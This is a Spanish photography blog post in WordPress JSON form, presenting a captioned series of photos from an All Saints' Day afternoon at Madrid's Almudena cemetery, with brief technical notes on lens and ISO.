{"id":3389,"date":"2022-11-02T17:25:44","date_gmt":"2022-11-02T16:25:44","guid":{"rendered":"https:\/\/www.perez-tome.net\/pptgrafia\/?p=3389"},"modified":"2026-02-04T15:49:07","modified_gmt":"2026-02-04T14:49:07","slug":"la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena","status":"publish","type":"post","link":"https:\/\/www.perez-tome.net\/pptgrafia\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\/","title":{"rendered":"La tarde de Todos los Santos en el Cementerio de la Almudena"},"content":{"rendered":"<p style=\"text-align: left;\">La tarde de Todos los Santos en el Cementerio de la Almudena. Suelo visitar la Almudena casi todos los a\u00f1os. La visita al atardecer al cementerio tiene muchas lecturas. Las fotos est\u00e1n puestas en orden cronol\u00f3gico y para ver despacio. Desde el punto de vista t\u00e9cnico me obligu\u00e9 en esta ocasi\u00f3n a no cambiar de objetivo (70-300) y moverme m\u00e1s y no cambiar la ISO (2500) tampoco.<\/p>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_3390\" aria-describedby=\"caption-attachment-3390\" style=\"width: 400px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09073-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3390\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09073-931x640.jpg\" alt=\"\" width=\"400\" height=\"275\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09073-931x640.jpg 931w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09073-scaled.jpg 800w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09073-768x528.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09073-1536x1056.jpg 1536w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09073-2048x1408.jpg 2048w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><figcaption id=\"caption-attachment-3390\" class=\"wp-caption-text\">Los puestos con las mujeres con ademanes para que pares, te avisan: ya llegas al cementerio.<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_3391\" aria-describedby=\"caption-attachment-3391\" style=\"width: 400px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09075-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3391\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09075-960x640.jpg\" alt=\"\" width=\"400\" height=\"267\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09075-960x640.jpg 960w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09075-scaled.jpg 800w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09075-768x512.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09075-1536x1024.jpg 1536w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09075-2048x1365.jpg 2048w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><figcaption id=\"caption-attachment-3391\" class=\"wp-caption-text\">Para ir al cementerio hay quien se viste de blanco y negro.<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_3392\" aria-describedby=\"caption-attachment-3392\" style=\"width: 400px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09093-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3392\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09093-1067x640.jpg\" alt=\"\" width=\"400\" height=\"240\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09093-1067x640.jpg 1067w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09093-scaled.jpg 800w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09093-768x461.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09093-1536x921.jpg 1536w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09093-2048x1229.jpg 2048w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><figcaption id=\"caption-attachment-3392\" class=\"wp-caption-text\">Hay familias rotas hasta \u00abpost mortem\u00bb.<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_3393\" aria-describedby=\"caption-attachment-3393\" style=\"width: 400px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09099-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3393\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09099-427x640.jpg\" alt=\"\" width=\"400\" height=\"600\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09099-427x640.jpg 427w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09099-417x625.jpg 417w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09099-768x1152.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09099-1024x1536.jpg 1024w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09099-1365x2048.jpg 1365w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09099-scaled.jpg 533w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><figcaption id=\"caption-attachment-3393\" class=\"wp-caption-text\">\u00abPon la benditera esa en la cruz que ah\u00ed pega&#8230;\u00bb.<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_3395\" aria-describedby=\"caption-attachment-3395\" style=\"width: 400px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09106-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3395\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09106-709x640.jpg\" alt=\"\" width=\"400\" height=\"361\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09106-709x640.jpg 709w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09106-693x625.jpg 693w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09106-768x693.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09106-1536x1386.jpg 1536w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09106-2048x1848.jpg 2048w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09106-scaled.jpg 800w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><figcaption id=\"caption-attachment-3395\" class=\"wp-caption-text\">Qu\u00e9 dif\u00edcil digerir lo de que \u00abDios sabe m\u00e1s\u00bb<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_3396\" aria-describedby=\"caption-attachment-3396\" style=\"width: 400px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09107-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3396\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09107-427x640.jpg\" alt=\"\" width=\"400\" height=\"600\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09107-427x640.jpg 427w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09107-417x625.jpg 417w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09107-768x1152.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09107-1024x1536.jpg 1024w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09107-1365x2048.jpg 1365w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09107-scaled.jpg 533w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><figcaption id=\"caption-attachment-3396\" class=\"wp-caption-text\">Atardece sobre los nichos m\u00e1s antiguos de la Almudena.<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_3397\" aria-describedby=\"caption-attachment-3397\" style=\"width: 400px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09108-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3397\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09108-517x640.jpg\" alt=\"\" width=\"400\" height=\"495\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09108-517x640.jpg 517w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09108-504x625.jpg 504w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09108-768x952.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09108-1240x1536.jpg 1240w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09108-1653x2048.jpg 1653w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09108-scaled.jpg 646w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><figcaption id=\"caption-attachment-3397\" class=\"wp-caption-text\">\u00bfNo te olvidan?<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_3398\" aria-describedby=\"caption-attachment-3398\" style=\"width: 400px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09109-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3398\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09109-475x640.jpg\" alt=\"\" width=\"400\" height=\"539\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09109-475x640.jpg 475w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09109-464x625.jpg 464w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09109-768x1034.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09109-1141x1536.jpg 1141w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09109-1522x2048.jpg 1522w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09109-scaled.jpg 594w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><figcaption id=\"caption-attachment-3398\" class=\"wp-caption-text\">Sin vida no hay muerte. Y la vida puede m\u00e1s que la muerte.<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_3399\" aria-describedby=\"caption-attachment-3399\" style=\"width: 400px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09110-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3399\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09110-427x640.jpg\" alt=\"\" width=\"400\" height=\"600\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09110-427x640.jpg 427w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09110-417x625.jpg 417w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09110-768x1152.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09110-1024x1536.jpg 1024w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09110-1365x2048.jpg 1365w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09110-scaled.jpg 533w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><figcaption id=\"caption-attachment-3399\" class=\"wp-caption-text\">De los nichos m\u00e1s antiguos de la Almudena: 1843. \u00abCreador de las Escuelas de P\u00e1rvulos\u00bb.<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_3400\" aria-describedby=\"caption-attachment-3400\" style=\"width: 400px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09112-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3400\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09112-455x640.jpg\" alt=\"\" width=\"400\" height=\"562\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09112-455x640.jpg 455w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09112-445x625.jpg 445w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09112-768x1080.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09112-1092x1536.jpg 1092w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09112-1457x2048.jpg 1457w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09112-scaled.jpg 569w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><figcaption id=\"caption-attachment-3400\" class=\"wp-caption-text\">El bisel lo hace el atardecer.<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_3401\" aria-describedby=\"caption-attachment-3401\" style=\"width: 400px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09113-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3401\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09113-960x640.jpg\" alt=\"\" width=\"400\" height=\"267\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09113-960x640.jpg 960w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09113-scaled.jpg 800w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09113-768x512.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09113-1536x1024.jpg 1536w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09113-2048x1365.jpg 2048w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><figcaption id=\"caption-attachment-3401\" class=\"wp-caption-text\">No es un escenario. Es la realidad.<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_3404\" aria-describedby=\"caption-attachment-3404\" style=\"width: 400px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09120-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3404\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09120-1096x640.jpg\" alt=\"\" width=\"400\" height=\"234\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09120-1096x640.jpg 1096w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09120-scaled.jpg 800w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09120-768x448.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09120-1536x897.jpg 1536w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09120-2048x1196.jpg 2048w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><figcaption id=\"caption-attachment-3404\" class=\"wp-caption-text\">Estas tres fotos son de la misma escena. Incre\u00edble.<\/figcaption><\/figure>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09119-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-3403\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09119-1040x640.jpg\" alt=\"\" width=\"400\" height=\"246\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09119-1040x640.jpg 1040w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09119-scaled.jpg 800w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09119-768x473.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09119-1536x945.jpg 1536w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09119-2048x1261.jpg 2048w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09116-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-3402\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09116-960x640.jpg\" alt=\"\" width=\"400\" height=\"267\"\/><\/a> &nbsp;<\/p>\n<figure id=\"attachment_3405\" aria-describedby=\"caption-attachment-3405\" style=\"width: 400px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09121-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3405\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09121-641x640.jpg\" alt=\"\" width=\"400\" height=\"400\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09121-641x640.jpg 641w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09121-626x625.jpg 626w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09121-150x150.jpg 150w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09121-768x767.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09121-1536x1533.jpg 1536w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09121-2048x2044.jpg 2048w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09121-scaled.jpg 800w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><figcaption id=\"caption-attachment-3405\" class=\"wp-caption-text\">La hora bruja no es la hora de esta se\u00f1ora. Es \u00abal atardecer de la vida&#8230;\u00bb<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_3406\" aria-describedby=\"caption-attachment-3406\" style=\"width: 400px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09123-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3406\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09123-456x640.jpg\" alt=\"\" width=\"400\" height=\"562\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09123-456x640.jpg 456w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09123-445x625.jpg 445w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09123-768x1079.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09123-1093x1536.jpg 1093w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09123-1458x2048.jpg 1458w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09123-scaled.jpg 569w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><figcaption id=\"caption-attachment-3406\" class=\"wp-caption-text\">Y este cementerio \u00bfd\u00f3nde est\u00e1?<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_3408\" aria-describedby=\"caption-attachment-3408\" style=\"width: 400px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09125-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3408\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09125-1215x640.jpg\" alt=\"\" width=\"400\" height=\"211\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09125-1215x640.jpg 1215w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09125-scaled.jpg 800w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09125-768x405.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09125-1536x809.jpg 1536w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09125-2048x1079.jpg 2048w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><figcaption id=\"caption-attachment-3408\" class=\"wp-caption-text\">Next&#8230;<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_3409\" aria-describedby=\"caption-attachment-3409\" style=\"width: 400px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09129-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3409\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09129-971x640.jpg\" alt=\"\" width=\"400\" height=\"264\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09129-971x640.jpg 971w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09129-scaled.jpg 800w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09129-768x506.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09129-1536x1013.jpg 1536w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09129-2048x1350.jpg 2048w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><figcaption id=\"caption-attachment-3409\" class=\"wp-caption-text\">Amigos que uno se encuentra en el Cementerio.<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_3410\" aria-describedby=\"caption-attachment-3410\" style=\"width: 400px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09131-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3410\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09131-960x640.jpg\" alt=\"\" width=\"400\" height=\"267\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09131-960x640.jpg 960w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09131-scaled.jpg 800w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09131-768x512.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09131-1536x1024.jpg 1536w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09131-2048x1365.jpg 2048w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><figcaption id=\"caption-attachment-3410\" class=\"wp-caption-text\">Tener televisi\u00f3n y ver m\u00e1s all\u00e1&#8230;<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_3411\" aria-describedby=\"caption-attachment-3411\" style=\"width: 400px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09134-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3411\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09134-766x640.jpg\" alt=\"\" width=\"400\" height=\"334\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09134-766x640.jpg 766w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09134-748x625.jpg 748w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09134-768x641.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09134-1536x1283.jpg 1536w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09134-2048x1710.jpg 2048w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09134-scaled.jpg 800w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><figcaption id=\"caption-attachment-3411\" class=\"wp-caption-text\">La familia gitana, un ejemplo en algunas cosas&#8230;<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_3412\" aria-describedby=\"caption-attachment-3412\" style=\"width: 405px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09142-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3412 size-medium\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09142-405x640.jpg\" alt=\"\" width=\"405\" height=\"640\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09142-405x640.jpg 405w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09142-396x625.jpg 396w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09142-768x1213.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09142-973x1536.jpg 973w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09142-1297x2048.jpg 1297w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09142-scaled.jpg 507w\" sizes=\"auto, (max-width: 405px) 100vw, 405px\" \/><\/a><figcaption id=\"caption-attachment-3412\" class=\"wp-caption-text\">Hay panteones familiares con sorpresas como esta.<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_3413\" 